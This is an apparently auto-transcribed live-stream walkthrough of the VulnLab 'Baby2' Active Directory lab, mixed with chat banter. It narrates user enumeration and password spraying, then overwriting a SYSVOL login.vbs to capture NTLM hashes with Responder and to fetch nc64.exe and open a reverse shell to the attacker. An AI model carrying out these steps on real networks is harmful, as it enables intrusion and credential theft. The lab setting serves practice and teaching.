We are on Baby2 on VulnLab. We tried to do this one the other night, but we had a bunch of problems with the machine and with the Kali machine. I got that all fixed. I actually created a bash script that is now on GitHub. So head over to GitHub. This is for like brand new Kali installs, just so you know. If you install anything before this, it may not work. So it's like when you very first install Kali or whatever. But if you go to github.com/overgrowncarrot1, it's called like Kali Quick Start or something like that. I think I called it. It's just a quick bash script. Yeah, quick Kali. There you go. It's just a bash script that goes through and installs a bunch of tools. But one of the things I think you guys might like on it is it does also install the Masada guides. I don't know what that is, but it does install that, which is for DACL edit, which I know I have a whole video on just to be able to install DACL edit. And this tool, this guy right here, does that for you, but it installs, the shutdown repo from Impacket. It installs everything's under pipx. It installs ORED, PyWhisker, target Kerberoast, the PKI and IT toolkit, which I have a video on also. It fixes OS crypto, so it uninstalls and reinstalls the one that you need. Installs Flameshot there, Obsidian, just mostly the stuff that I have on here that people ask me, like, how do I install it? If you're looking for YouTube, it's going to be under socials. 1 second. I can actually drop it on here. If I actually watch my own videos, then I can actually, 1 second. There you go. There it is, like right there. And it's how you doing? All right, so let's go ahead and let's start. Let's hit this machine up because we had problems with it yesterday, and we're not going to have problems with it today now, are we? We're going to go through and we're going to get it today, and we're going to show it what's up. So now I do also have a Medium post on this too. So if you go to Ryan Yeager Medium, right, I think it's actually under System Weakness. But if you go in here, all right, and then you can search for whatever else. But I do actually have Baby2 like right there. It was published by System Weakness on October 14, 2023. So you can read that if you want to. If you don't want to follow along on here, or if you want to follow along while reading it, or you just want to see a command again or something like that, there you go. So we're going to see desktop. We'll make directory VulnLab. Seating there. And we'll go ahead and make directory Baby2. Seating it there. We'll go ahead and we'll clear that out. We'll start off with our Rust scan here. Ooh. Okay, I did not install Rust scan. And that is also not on here. So let's go ahead and do that like real quick, shall we? So let's go ahead and look up Rust scan. GitHub. Because that's a problem, that wasn't it? Since I didn't install Rust scan. So let me go ahead and also edit this guy too. We'll just edit it straight up in here. We'll say something like, I don't know, we'll do it around here somewhere. Instead of uninstalling like right there, we'll say echo installing Rust scan. There we go. So I already figured out one problem with this guy. I did not install Rust scan on this. So now he's got to scroll down, try to find one for us. 2 SS there, source code. SS4. Is this one I want? There's Rust scan. Okay, AMD64.deb. Okay, let's go ahead and open that link in a new tab so we can actually get the exact thing for it. There we go. And then all we got to do is just say, hey, we want wget this right. So we're going to go ahead and we're going to do a quick over here. Wget that guy right there. We're just going to go ahead and move into downloads over here. Oh, CD and down. I don't know why I just did it. Move in downloads. Okay, and we have our deb file like right there for Rust scan, right? So we can go ahead and just do a dpkg sudo dpkg -i for that Rust scan deb file, right? And there we go, right? So we don't have to actually move it in downloads on the other one because since we're doing wget, it's going to bring it right to that directory you're already in. So we'll say that, and then we'll just say this like real quick. And then there we go. Rust scan will be installed after that. Whoops. Let's go ahead and commit those changes. And there we are. Okay, so now Rust scan is also now on there too. So now we should have Rust scan now, and we do. Cool. So let's go ahead and CD back into desktop, VulnLab Baby2, and we'll start off with our Rust scan here. And we want to do tac U limit of 5,000, tac A, the IP address for the machine, which is going to be 10.10.78.184. tac PN. I just like doing that like right there. What do we got here? Tac A was expected. Oh, because tac A is gone now, isn't it? We don't do tac A anymore, do we? There we go. I'm about to say I got the old Rust scan on my laptop. All right, so we get quite a few ports open here, right? Looks like it's going to be a domain controller. We have Kerberos like right there. Looks like we got port 389, so we got LDAP, we have SMB open, we have LDAP secure. All right, I don't even think that's all the ports actually. There's more ports on here than what that even shows. Because yesterday we were doing it, we had like 5985 open, 3389, so we had WinRM, and we also had Remina, or X3RDP open. I don't think I put Remina on there either. Oh my god, I'm doing horrible. So let's go ahead and fix this again. See? As I figure out throughout the stream that I didn't install certain things. So we'll just say echo install a Remina, sudo apt install Remina tac Y, so you don't have to say yes. And then we'll go ahead and we'll commit that change. There we go. That should work over here. There we go. For some reason, this thing's not showing a lot of the ports that are open like right now. I wonder if I'm just killing it or if it's just having problems or whatever else. But it does have all those ports open on it. I do know that. We try just like a quick mmap. Let's try that. Or maybe I killed it. I don't know. Did I lose my... Let's go ahead and stop that. We'll start it back up again. And let's see if we get anything over here. Not looking like it, is it? Did I kill the machine? Let's try something like that. See if it actually connects to it. Might have to reset the machine. Okay, so it does connect to it. Okay, cool. So let's go ahead and do a quick, so we look for anonymous login, right, on SMB. Remember, you can try tac U and then just 2 parentheses, or you can try tac U anonymous. Try it both ways. Always try it both ways, okay? So I'll do a quick sudo nano etc host. And let's go ahead and throw this guy and say baby2.vl. Throw that in my etc host like right there. And we do have read and write over homes directory, and we also can read the IPC and net logon. So we may be able to do a tac RID brute. And we'll try to save that into brute.txt. See if anyone's over there on YouTube like right now. Doesn't look like it yet. Thad, how you doing? What's going on? What is that? Twitch con hype? Oh my god. That's scary. Okay, so it is getting people. Okay, cool. Okay, cool. So it looks like we got that just stopped. So what I'm going to do now is I'm going to go ahead and cat that. And I'm just going to grep tac I for user. And we should just be able to see all the users, right? I actually don't want domain user, so I actually want to do like a SID type user. That tac I just says doesn't care if it's capital or lowercase. That's all it says. It's not case sensitive. All right, so there's all my users like right there, right? So let's go ahead and actually save that. It's like a.txt. Then we'll cut tac D, and we'll cut out the, let's say the slash, right? So this guy like right here, right? This slash like right here. Okay. And then we'll do tac F2 because we want this side of it, right? So this side would be 1. This side over here would be 1. This side over here would be 2. Oh, awesome, Ted. Looking good. And then, so we got that like right there. It's actually very difficult to get a streak with me watching the Twitch. Watching the Twitch. I'm old. All right, it's actually really hard to get a streak with me because I just stream at, whatever the hell I want. So there's no schedule to this. All right, and if we say that for a.txt, right, we should be able to just, yep, there we go. Awesome, okay. So now if we can say that, like let's say b.txt, then we'll go ahead and we'll cut tac D. And now we want to do attack F1 because we want this side of it, right? So that's going to be 1. And if we cut this guy out, that's going to be 2, like right there. And we'll do that to b.text. And we'll save that. We'll save that into c.text. We'll go ahead and cat that c.text. And if you watch the stream for long enough, you know exactly what I'm about to do now. I have to look up, remove all white space, bash. And then I'm going to click on the very first one. I'm telling you, if this Stack Overflow goes away, I'm just going to quit. That's it. I'm never going to... This one post like right here, I use, I think, like 100 times. And I've yet to save the command, and I've yet to remember it. So we're going to go ahead and we're going to cat that c.text. We're going to do that sed, and we'll save that into users.text. Now we can remove tech rf that a, b, and c.text. All right, I do want to cat that brute.text and keep that like right there because I do have all the groups in here. I have aliases in here, all that stuff, right? But if I go ahead and cat that user.text now, I have this like right here, right? So if we continue to enumerate this machine, if we start looking at LDAP search, if we start looking at everything, we're going to realize very quickly we don't have rights really to look at much else. Okay, so from here, next logical step would be to try to use, brute force something, right? So we're going to X as a B, attack U, except for this time we're going to do user.text. And we're just going to see if the username and password is the same on somebody, right? User.text, okay? And we'll go ahead and save that into pass brute.text, right? Oh, you don't really want to hear what I'm thinking. I wouldn't want to hear what I'm thinking. Okay, do we get that pass brute.text? All right, so it obviously is working. Now what we want to do here, okay, is we want to go ahead and we just want to grep like for a plus sign, okay? Because this like right here will change to a plus sign if we could log in. We don't want to necessarily grep for like pond or shell or something like that, you know? Actually, speak about that. I do actually want to change out my what's my, oh, that's there we go. I do want to change out my xt.com file. Can I make this say bigger for you guys? There you go. Yes, I can. Save that. Let's see what we got here. Okay, still nothing yet. Yeah, Marines don't think. I don't think about anything. That have you lost the motivation, or have you just become good, like so good that you're just like, yeah, whatever now? Still nothing yet. We're still going through all those different usernames and everything like that, right? All those different people. This is going to take a minute. So that's just life. Losing the motivation. How long you been doing it for, Thad? And why you losing motivation? That's the real question. But how long have you been doing it for? Because I've 100% lost the motivation before. 3 years? Yeah, okay. Have you taken like a month off ever? Or do you try to like learn as much as possible every time? Okay. Take like months off of that. Do you like hacking like one thing more than another? Like have you looked in like hacking Android or hacking video games or hacking APKs? Have you looked into things like that? Or maybe start looking into something like binary stuff or not binary, but like yeah, I would start that like well, do you do a lot of Active Directory? I really like Active Directory if you can't tell. I'm sure everyone can tell. But when you start feeling like you're in a rut or something like that, I've noticed that like if you're hacking like a lot of boxes and they're Windows, you know, just a regular like Windows 7, Windows 10, you know, and you know there's not really much pivoting, or if it's a bunch of Linux machines and you get on, as soon as you get on, you go to the app folder, you see something in there, and then you are like, okay, cool. You put pspy in it, and yep, it's running. It's running this every minute or whatever. I've noticed that does get old. It does. But I would move on to something else. Like move on to like start trying to learn like Android hacking maybe. Maybe that might really be something that you're like, oh damn, like I like this a lot. Um, yeah, I do not like these CTF-ish style boxes. I don't. That is one thing that I do not like. Or like you get in a box and it has like that what is it called, that brain fuck Cody, stuff like that. You're like, yo, nobody's gonna have this. Like this is not realistic at all. You know, no one's gonna have a port that's facing out into the real world. It's like, what's your name? And then you're like, oh, I have to do a binary exploit of this. That's not gonna, no, that's never gonna happen. You know what I'm saying? Or buffer overflow on this. Brand new program just came out. No. Um, but I would start to look into, like things like what is it? Maybe start looking into VulnLab is great. I think a lot of these are very realistic paths. Okay, cool. We got somebody here, but VulnLab is really good. What I'm working on like right now. Um, VHL, which is it's a little more expensive, but virtual hacking labs, that one's really good. And you start to have to like put exploits together and actually be able to move through a system like that. Um, Hack the Box Academy, I found to be awesome, and like the skills assessment at the end and stuff like that. A lot of them are really really good. More CTFs. You just say you don't like it. No, I was kidding. But yeah, I would start to just there you'll find something that you're like, man, I really like doing this one. You know what I'm saying? I really like moving through these and stuff like that. All right, so we do get this guy Carl Moore, right? We get one person. We'll keep looking through this because I know some more people are gonna come through. But we do get this guy Carl Moore. So let's go ahead and see if he can do anything, right? Let's go ahead and we'll look at NXC, or actually, I'll just crack everything. Oh, did I not actually make that executable? Did I actually never download my own tool? I didn't. Okay, cool. I think what's funny is I think I even put it on here in GitHub, but I don't think I actually, yeah, I don't think I actually downloaded it myself. That's what's funny. Is actually put it into the script, didn't download it. Just so everyone knows, also for Crack Everything, I did now change this. It is changed fully to be NXC, and it no longer calls for crap exec. So if you are not using netexec yet, then line 56 does need to be changed to crap exec. And netexec is just going to go away. I'm only going to be working on this one like right here, okay? Yeah, it's in that it is in it's in pitback. It's usually pitback shutdown repo. So let's go ahead and we will from here change mode plus X for crack everything. CD back into here. I'm just gonna do a quick crack everything. TAC R, we'll put this guy in there, right? TAC D for the domain, Baby2. TAC U, we got Carl Moore, right? TAC P, Carl Moore, we're just going to check. I just changed the shell, right? That should be everything right there. Should be everything that I need. Android AP. I don't really do it very much, so I wouldn't feel comfortable streaming it just yet. You know what I'm saying? I do have like one Android box, I think, on my on YouTube. I don't even know which box it is. It's one of the what is it? One of the Hack the Box boxes. But I did do one in virtual hacking labs, and I just thought, and I was like, wow, I did it. Like I thought, like holy crap, I actually did it. Something else you could do with Crack Everything is you can grep for a plus sign. Okay. This is something else. That tag Z says just grep. That's all I'll say is just grepping. So let's go run tests, see if we have plus sign everything. So we don't necessarily have to look at, hey, are we an admin somewhere or do we have a shell somewhere? But can we at least, utilize this guy to log in somewhere? Because remote desktop, a lot of times doesn't say that we pawned it, or shell or whatever else you put it as. And we see like right here now, right? So we have remote desktop on here, 100%. We have SMB on here, right? So we just can't run commands on it. We don't have admin dollar star. We don't have that share. We can't write to it. That's why we just get this plus sign here. Let's go ahead and grab up here again. We still have Carl Moore, right? Oh, I didn't do continue on success, did I? Well, I jacked that up, didn't I? So we're going to have to do this again. Well, sorry. Continue. There we go. Okay, my fault. So we're going to have to do that one more time. Air gear, I don't really care how you use them. I mean, they're made so that people can use them for penetration testing, but in all honesty, every single thing that could be used for good could be used for bad. So, in all honesty, whatever you do with it, you do with it. I don't care. You know what I'm saying? Like, you download it, you used it. It's not like some like baking software hacking app, that I'm selling or something like that. It's every single thing inside those tools, you can find it somewhere else. It's just I put it together, that's all. Okay, so we have this Carl Moore guy, right? We get it through SMB and also RDP, right? Yeah, like you could use it for bad. I don't care. But just when you get caught and they come up to me, they say, "Hey, did you make this tool?" I'll be like, "Yep." They're like, "Well, this guy used it." I say, "I don't care." Like that's kind of like going to the dealership and saying, "Hey, this guy ran over somebody with the car they bought at your dealership." Okay, what am I supposed to do about that? So or what people always say actually is going to the gun manufacturer and saying, "Hey, this gun killed somebody." No, the gun didn't actually. Actually, the bullet actually is what killed them. I never understood why people always say the gun killed them. The thing coming out of the gun, that small little 9mm or 5.56, that's what actually killed them. Hey, Wicked Blue Ninja, thank you very much for the subs again. Thank you. Wicked Blue Ninja, if you guys don't know, I think every time he's in here, I think he just gives out a bunch of subs. So thank you very much as always. I don't think you did, Wicked Blue Ninja. That's the thing, is I don't think you did. I want to check that. I don't know if you did. All right. So we got Carl Moore here, right? And so let's go ahead and look at Carl Moore here and see what we got, right? So let's go ahead and Remina. We could try Remina into him. We can also use that. Let's go ahead and do it at SMB first. Actually, you know what? I'm going to use crack everything just so you guys can see that again. And we're just going to get rid of this TAC J, like right here. That's all. I don't really care about the plus side too much. That's whatever, but we're just going to enter here. And what this is going to do now is it's going to go through and it's going to run different commands, right? So we got shares, group, user, session, computers, password, policy. Okay, it's going to run a whole bunch of different stuff on here. Now, it will not run anything to do with LDAP just yet. Okay, and that's because LDAP takes a very long time to run. That's why I won't run anything with LDAP. That's the only reason. Okay, we can also go ahead and we could try to maybe run something with and actually, this is the worst spot in the world. I'm actually going to stop that because. Yep, I was saying we got a whole bunch of ports. SMB, WinRM. Nope, LDAP. Nope, okay, cool. SMB.txt. What else do we have? RDP.txt. I'll say it's going to run all this stuff. It's going to drop a whole bunch of files, stuff like that, right? So, and I want to drop all these files in there in all honesty. Okay, so we'll CD into desktop right there. Then we'll run that again. So we can drop all the files in here, and I'll be okay with that. So this is going to run a whole bunch of different commands. Oh, whatever, White Zombie. You can ask anything you want, dude. What's up, Ready to Hunt? How you doing? I haven't checked YouTube in a while. I apologize over on YouTube. Okay, no worries. Nobody wrote to me. I suck. All right. See what we got so far. So let's go do that. Now, if we cat the smb.txt, you can see it now instead of just having just like, hey, that tag J just checks to see stuff. If you run it without that tag J, it's going to check for everything else, right? So we see that apps is read and write, docs is read and write, homes is read and write. We got sysvul. We got a lot more stuff here now, right? We could try like an XC and I always forget how to do the spider. So I actually want to do an SMB like real quick. We're going to do a tag help. I wonder if I can grab for spider. Okay, cool. Let's go ahead and try to spider a share. Tag XCSMB, tag U. Nope. My IP address, tag U, Carl.more. Tag P, Carl.more. Remember, Windows does not care. Case sensitivity is not a thing on usernames. It is on passwords. All right. From here, we have, I wanted to actually do a tag spider. And let's say like we'll spider, let's say sysvul. I never really get spider to work. The White Zombie, I think that Ubuntu would be the closest to it, the closest to Windows, and the most friendly one, especially if you're not good with Linux. I don't know how good you are with Linux or anything like that, but if you're not very good with Linux, Ubuntu will be the nicest one to use. You know what I'm saying? Like the closest to it. But as you can see now, we see a lot more stuff in here. So if I were to cat the smb.txt, we can see a lot more stuff inside here, right? We have the password policies. We have a whole bunch of different stuff now, right? This will also try to run commands on the machine also. So if we were to, we got shell on like, okay, so it says done spidering, but didn't really give us any information on did it. So let's go ahead and do an SMB client over here. And we'll just do it for, oh, I should probably do it for, let's say sysvul. All right, so we can see just more stuff, you know, and if it'll also try to run commands like that too. So we can try to cat that rdp.txt. We cat that winrm.txt or wi.txt. All right, it's going to just try more things. Is winrm actually not open on this machine? Okay, but it will try more things. We'll try to find more stuff and things like that and just drop a whole bunch of stuff for you. Like users, you know, password policies, groups, all that stuff. See if anyone's actually logged on. And from here, you can also see, you know, if we have read and write access and everything like that. Okay. So we come over here and we'll do an ls. Okay, let's go ahead and cd into Baby2. Here we are on Windows machines, so we do that. And scripts looks like a nice one, right? So let's go ahead and cd that scripts. All right, now remember, we can't write to this, right? But we do have this login.vps. We could try to put something in here just because it's so far deep it in. We say exit echo text, maybe, into test.txt or whatever, and we can try to put that in there. All right, so it actually does work. Because we moved, yeah, we couldn't write to sysvul, but we can write to sysvul Baby2 VL scripts. Okay, so just because you can't write somewhere, still go deeper in, all right, and see what you can find in there, right? So try to go like a little bit deeper into it and see if you can find more stuff in it, okay? Let's cat that pass group. Okay, cool. So we got Carl Moore library. Cool. All right, so we got a couple guys in here now, right? And we see that we have this login.vps. Okay, let's go ahead and type this out. Let's go ahead and get this. Because we know we can write to this now, right? So if we can write to it, that means we could probably overwrite whatever this login.vbs is, right? So let's go ahead and cat that login.vbs. And in case you're wondering, like, hey, how would you ever be able to find that, right? There's a couple different things in here that actually do point to it, okay? or just going through and just start to look at stuff, right? But let's go ahead and let's check out those shares again. So we have homes, we have net logon, and we have docs, right? We can read and write to that, and we have apps, okay? So let's go ahead and look at homes, right? And we have library and call wars passwords. So we want to look at both those places, right? Hey, brother, I'm out. Got work. All right, hey, man. Wicked Blue Ninja, thank you very much for the subs again, as always. You have a good one. I'll talk to you later. All right, let's go and do a DIR. Okay, let's go ahead and CD to Carl Moore first, because that's our user like right now, right? All right, nothing in here. CD // library. Can we actually CD to it, do a DIR? Okay, we can. Nothing in here, right? So we're not really seeing much, right? Now we may just not be getting, anything in here. We can also try like a prompt off, recurse on, mget star. We can also try something like this too and see if we get anything at all in here. And if we did, then we would actually start seeing it underneath here dropping down. But there is a spot, and I don't really remember exactly where it's at. Okay, so we had apps also, right? And remember, we may also have to log in as library. Library may have different rights. Okay, so we do have a dev in here. Okay, we have a login VBS link. It's kind of weird. Let's go ahead and get that. So we do have a link for it. And we see that it's going to sysvol. C Windows sysvol, sysvol Baby2 scripts. So we know it's going there, right? So once we see that, now we can go ahead and get a sysvol. And what we see here is it's mapping the network share, right? Okay, map network share. So what if we were able to start responder on TUD 0, right? What if we were able to do something like this? And if we can do that, and then we can go ahead and take the script, that login.vbs script, and let's put our IP address at the bottom of it. But let's tell it to, hey, go ahead and I want you to come to me, right? And let's see if this is running on a scheduled task, right? So let's just go ahead and just say, hey, I want you to actually go here /share or whatever. I don't care where it goes, right? I don't care. We got responder up. /share. I don't care, right? There we go. Thank you very much. We'll save that. We're going to go ahead and bring our SMB back into that sysvol. We'll CD into baby scripts, right? Wasn't it? Okay, let's go ahead and delete that login. And let's go ahead and put login. Okay, cool. Let's go ahead and delete that test.txt also. So let's go ahead and see now when that link gets clicked on, if it's calling back to here, because it should be calling back to here, right? That link is going back to C Windows sysvol, which is right where we're at here. So if somebody clicks on that link, it should technically run what we just put in there, which is, there you go. Okay, well, I was about to say, which is our script that's making it call back to us, right? Our malicious script that we put in there. So it looks like we have a NTLM version 1 hash, which I'm not really too used to. Usually I get version 2 hashes. Let's go ahead and echo this into hash.txt. Let's try to do it with just John, because like I said, I don't really use this one. Rocku has gun zipped. Another thing to put in that little startup script, huh? So let's go ahead and put that in there too. And so we'll come back over here. There we go. if it changes. Cool. So that's been changed again. So now we can go ahead and we can run this over here. That John that we just ran. Yep, this guy right here. Let's see if we can do that. Okay, so it doesn't really like that very much, but it does see net at TLM. So let's go ahead and do a tac format. Net at TLM. At TLM version 1, right? That's what we want. I guess is that one, I guess. Oh, like I said, I haven't really ever done NTLM version 1 that I remember. So we can also look up the Hashcat wiki, right? Firefox and Brave? What do you mean? Are not Firefox and Brave designed to be independent shells where you can disrupt anything outside of it? I don't know. I have no idea, Dwight. I have no clue. Someone else in the chat may know. Oh, what's up, 7H30? How you doing? What's up, Theo? The browsers? I do not know. Let's look up NTLM v1. Yeah, not NTLM v1. Is that the only place that says v1? Not NTLM v1. 27,000 or 5,500. But supposedly the newest Hashcat, you actually don't need to actually tell what it is. So we should just be able to do hash.text, user share wordless rocky.text. Yes, supposedly you can auto detect now. I don't know how good it is at auto detecting. I don't know if it's good, we'll say, as John the Ripper, but it seems like it's doing something. What's it saying? Yeah, okay, found it. Okay, so this is 5,500. Cool. So the newest Hashcat, you do not technically need to. Oh, we got some freezing going on here. Hashcat's killing us. Tyler Ramsey, how you doing? Hey, Tyler Ramsey's over on YouTube, so you guys know. Well, he caught me live, and then this thing decided to freeze, which sounds about right, doesn't it? Although I didn't really put my resources to Cali this time, like I usually do. You're trying to tap opportunities to malicious but I'm not. Alright, so... But they do have a thing where they do that all the time. Yeah, you know, it is the joy of live streaming. It happens, right? Okay, what we're going to do is we're just going to go ahead and we're going to restart the machine like real quick. So, but at least we have everything, right? We have everything saved and all that stuff. Let's go ahead and turn it off. So you guys are going to most likely see a black screen here for like a second. Oh, no, you get to watch me double click on it. Oh my god, that's the problem. Oh my god. 1 second. I forgot the problem. Settings. Let's go ahead and go to storage. Or no, excuse me, system. There. Processor. There. That was the worst. Tyler knows. If you guys don't know, Tyler Ramsey, extremely smart penetration tester. Streams all the time. I actually just joined his. Yeah, Tyler, I texted you, or I didn't text you, but I messaged you on his Hack the Box. He has a Hack the Box team that he pretty much invited everyone to for the seasons. So I just joined that. Excited to start that, especially with him because he's extremely intelligent. So if you guys, he also has a YouTube channel. Let me see here. Let me try to find it. Tyler, if you want, you could drop your YouTube link in here. Alright. Let's go ahead and hop back into this guy over here. And we will... There we go. We're back in it. Let's go ahead and get back in that VPN and everything. Alright, cool. We're back in. And so we already have everything though, so that's good, right? So we can go ahead and do a hashcat, hash.text, user share where there's rocky.text. And now that we actually gave it something, it should work a little bit better now. What's up, DZ? How you doing? Good morning. Oh, I'll drop it over on Twitch. If you just drop your YouTube channel on the YouTube, Tyler, I'll copy it. I'll drop it over on Twitch. All right, cool. So it looks like we did not crack it. Okay. Now we have questions. So many questions now, right? But that's okay because we know that there's a couple of usernames and everything like that, right? Yeah, another day. Trebs, how you doing? What's up, man? This is actually the box that you actually requested, Trebs. So we know we can't crack that hash like right there, right? We do know that log VBS is doing something, and we do have some usernames, right? So let's go ahead and let's try Bloodhound Python, right? And let me go ahead and actually look it up like real quick on my Obsidian because it's a longer command and I always forget it because I'm not very intelligent. Bloodhound Python. That'll work. Whatever. This is actually for another box. And we do know that's Baby2, right? .vl. Okay, we have Carl Moore and library, right? So we can do library, TAC-P library. That's if we're using DNS chef like right there, in case you guys wonder why the heck it's like that. Okay, let me go ahead and grab that IP address again. Left side brain. Surrounding. We shouldn't need a DC in there anymore. We'll do a taxi all for collection method all. And what I actually want to do is actually want to make directory blood, right? And we'll actually see in blood right before this. Then we'll do this just so we have all those JSON files in one area. Let's go ahead and try that. Looking like it's going to work. Looking good. I know I have his YouTube somewhere. Hack Smarter, live with Tyler Ramsey. There we go. Okay, cool. This video is available anymore. God damn it, Tyler. Okay, there we go. Okay. He has a lot of fun videos. I do like his. So here is one of the videos on his channel so you guys can actually hop on over to his channel, stuff like that, and actually see it. Here you go. I just found one of the videos. Here we go. And he also streams under Hack Smarter. Yes, but they can be taken away also, Dwight. So you can get rid of guests and you also can change the name for administrator. So don't just think like, oh, well, it's always going to be administrator. It's not. I actually have a box and one of the things is admin. It's not administrator. What's up, Leon? How you doing? Also, if you guys have any actual like really hard questions, DZ64 loves to be direct messaged on Discord. I'm just kidding. Don't do that. But I would highly suggest you ask him like right now because that guy's a genius, complete genius, right? Let's go ahead and start up Neo4j. Back at work. That sounds horrible. I don't work anymore. No, I was kidding. Technically, I don't have a job. Like right now, I do have a job, but I don't have a position in that job. So I'm just kind of there. That's all. That's my job. I'm just there. But you know, since I'm in the Marine Corps, you just don't get fired for being there. So it's a great time. All right, let me go to desktop, VulnLab, Baby2, blood. There we go. Let's see if we can find anything in here. If it's a really good question, you won't. Let's try to look up library, right? There we go. Library. Let's see if we got anything in here, right, for library. Not looking like it so far. Enabled, okay, and not admin. Password never expires, okay. It's good. Nothing, okay. So let's go ahead and analyze things real quick. Carl Moore, I don't think had anything either because he wasn't admin anywhere or anything like that. That's because stuff I was about to say, he's the world's busiest man, and the stuff that he does stream is over everyone's head. He's too intelligent. I'm just kidding, DZ. Okay, so here's our shortest path to high value targets, which obviously, yeah, we'll just follow that. Oh, and I'll punch the mic also. Obviously, we'll just follow this. So, that'll be easy, right? Okay. Let's see what we have here. Joe Jennings has DC sync. That'll be something we want to look into, like right there. Okay. Let's try to make this a little bit easier to read, right? Still not really finding much in here because none of our guys have anything so far, right? So now we got to kind of dig like a little bit deeper, maybe start to look at, who these different people are and stuff like that, right? Or maybe just try to get because we already did that. We know that VBS works, right? So what's to say that we can't have that thing download, let's say, Netcat or like a Netcat 64? If DZ64 streamed more often, we would all be a much higher level than anything else. So what's to say that we can't set that VBS file to, so let's go ahead and sublime that login.vbs file, right? And we should be able to technically make this guy, because right now it's going back to a map network share. We don't really care about that, right? We want it to do an O shell command, if I remember correctly, DZ. What version of Linux are you using? Kali. So we should be able to do a set O shell, right? Is that correct? DZ64, I believe it is. And we'll go ahead, we'll equal create object. All right. We're not simply attempting to get a shell with, that's what we are doing. Oh, with W script? That's what we are doing, like right now. wscript.shell, right? wscript.shell? At least wscript.shell like that. And now from here, what we should be able to do is just do an oshell.run, and then we can type in different commands for it, right? So we could try something like /c curl, and we'll go ahead and we'll try curl for ifconfig, my IP address, right? Let's go ahead and try this thing right here. Curl for HTTP, right? Slash, go ahead and try curl for nc64.exe, tech o. Actually, what we should do is we should actually do an oshell.run, make directory c temp. Is it tech o and curl also? I think it is. I think it's still tech o and curl, right? We do oshell.run. ctemp nc64.exe, tech e command prompt, and go into my IP address on port 445 because we know 445 can talk to us, right? Is this a bash script right? No, this is a VBS script like right here. And what we're going to be doing with that is trying to create a reverse shell. So whenever someone goes to a link, it automatically runs this one that's in sysvol, right? So if this runs a link in sysvol, then what we can do from there, yeah, Trev, that's why I said this is the one that you requested this box. But as long as we can get that VBS shell, right? This is running a VBS, so once the guy clicks on the link, it'll call back to sysvol, which should then run these commands like right here, thus ultimately creating a reverse shell. So now we got to go back into SMB client. and the IP address for the machine. Sysvul. We know that Carl Moore can put stuff in there, right? And let's also, ooh, I don't have RL wrap on here either. So you know what that means? That's another thing to put in the this guy over here. There we go. This guy over here, the Kali Quick Start. Let's go ahead and unzip RockU, and then we can go ahead and installing RL wrap, right? That should just be a sudo apt install RL wrap. Tac Y. Let's just copy the whole command, make sure that actually works. We'll just go ahead and save it because I know it's going to work. That's how I roll. Okay. And from here, we'll cd into baby scripts. All right, cool. So we got that in there now, right? We'll put that login, that newest login.vbs that we have in there. We're all wrap. NC tech LVMP on port 445. And let's see if we get a callback with this, right? And let's see if that actually works. So if it takes more than a couple minutes, then we're, it's not going to work. I don't know. It'll tell you. We'll have to go back. We'll have to look at it again. So while we're waiting for this callback, I'm going to go ahead and take a quick 5-minute break. And then we'll hopefully get that callback, right? Let's go ahead and cat that login.vbs one more time. Just to make sure that all looks good. I should probably also start responder because I know that although tons 445 is not going to get it, is it? Well, I guess if it tries to go to here, it might hit that guy over there. So if it skips all this, if that doesn't work, then it might go to the other spot. I don't know. That's something that could happen though, right? Okay, we're going to take a quick break while this guy hopefully runs. If he doesn't run, then yeah, I guess we'll just going to have to figure out another way, right? It's not going to run actually because I didn't put that /c in there. So let's go ahead and actually sublime that like real quick, and we'll do that /c again. And we also need to start up a web server too. We also have to start up a web server also, obviously. So Python 3 are actually seeding in my tools folder, right? On port 80, and let's go ahead and put that back into there again. Boom. There we go. So now we're running all that. And like I said, I'm going to take a quick 5-minute break. Even though I said it 5 times now, I will be right back. All right, we're back. So I actually noticed something right before I got up and left. When I did the 5-minute thing, okay? This still hasn't come back also. So that's not good. We're getting that NC64. If I actually look at this like real quick, right? Okay. Something I didn't notice was I never did see how we don't have command.exe like right here. So I noticed a couple problems with this guy, right? We are curling it, so I don't know if it's actually saving in the correct place. I don't know if it's saving that ctemp. I don't know if we're allowed to make that directory. What we can do, though, is because we have supposedly remote desktop on here. Supposedly we do, right? If I go in and cat that rdp.txt for my crack everything, Carl Moore supposedly has it. So we could try to run it into it. I'd be highly surprised if we could, but we could try. Yes, please. Called out more. I'd be surprised if we could, just because if it is a domain controller, okay, yeah, we cannot. Okay, let's try library. It was library, if I remember correctly. Which again, I'd be surprised if we could. We cannot. Okay, let's try with Evil WinRM. I don't know if WinRM was open on this machine. About to find out. We also try again with library, like I said. I don't think it was open though, WinRM, if I remember correctly. Okay, so we know that we're getting it, but we know it's not actually running it, right? So instead of ctemp, maybe we can't make that directory. Maybe we can't do that. Maybe we don't have permissions to it. Some of that. I don't know. Let's try to just put it into C Windows temp because we know that exists, right? So we'll do a C Windows temp. And let's go ahead and get rid of this make directory because it's every single time if it is make directory that's saying, hey, the directory is already made. We'll go ahead and we'll can we do this with a VB script? Will that like actually like comment it? Is there comments in VB scripts? Okay, well, let's go ahead and delete that. We already know that that's not going to do anything for us. So let's just go ahead and we'll put that login.vbs. Yeah, I don't think that I remember seeing WinRM open. We'll try. Okay, let's go ahead and I'll wrap it again. Let's see what we get up here. See, it dizzying all the way down that second command, so it is trying to run the share again, but we're not getting the callback from nc64.exe, right? So it is going to the C Windows temp now. That may give us some more. We may be able to write to there maybe. Never put the safety on. Discord link. Let's see here. Let's see here. Now I gotta find a link for the Discord. Oh god, I suck at this part of it. Invite people. I know how to do this. Okay, copy. Alright. Minimize that. There you go. There's the Discord link for you. Addish. I don't know if we actually re-downloaded it or not. Wasn't watching. DZ, do you see anything wrong with it? With what I'm doing with it over there? That OS shell? There, I'll do that like right there so I know if it actually called back to me or not. Does this have to be tabbed in? Okay, we got it. Okay, cool. We're on. All right. So, yep. So, C temp seemed to have problems. Let's go and see if it actually made it. Oh, thank you. Thank you, DC. So, it did actually make it too. CD temp. Okay, maybe it just hates me. Because it was just C temp SC64. I don't know. Maybe it just didn't want to call from there. I don't know. But we finally did get it. Okay, maybe because he kept trying to make that directory, and it was just saying like it can't make this directory or whatever, and we messed it up at the very beginning, and it probably already ran, and so it just kept saying you can't make this directory, so it kept on coming up with a fault. Let's go ahead and do who am I? Okay, we're Amelia now. We're Amelia Griffiths. That's good to go. All right, let's go to who am I/all. See if she can do anything. She has any cool permissions. Let's go ahead and exit out of here. Exit out of here. We'll exit out of there. Okay, cool. There we go. We go ahead and move this over for now. We got Python server up and running over there. Okay, so it looks like we have remote desktop users for Amelia here. We do not know her password yet. We could try to get it. We could try to always see if we can get her actual password. So we'll do a sudo responder attack I ton 0, right? And we'll go ahead and yeah, don't care about that. And we'll go ahead and we'll just do maybe like 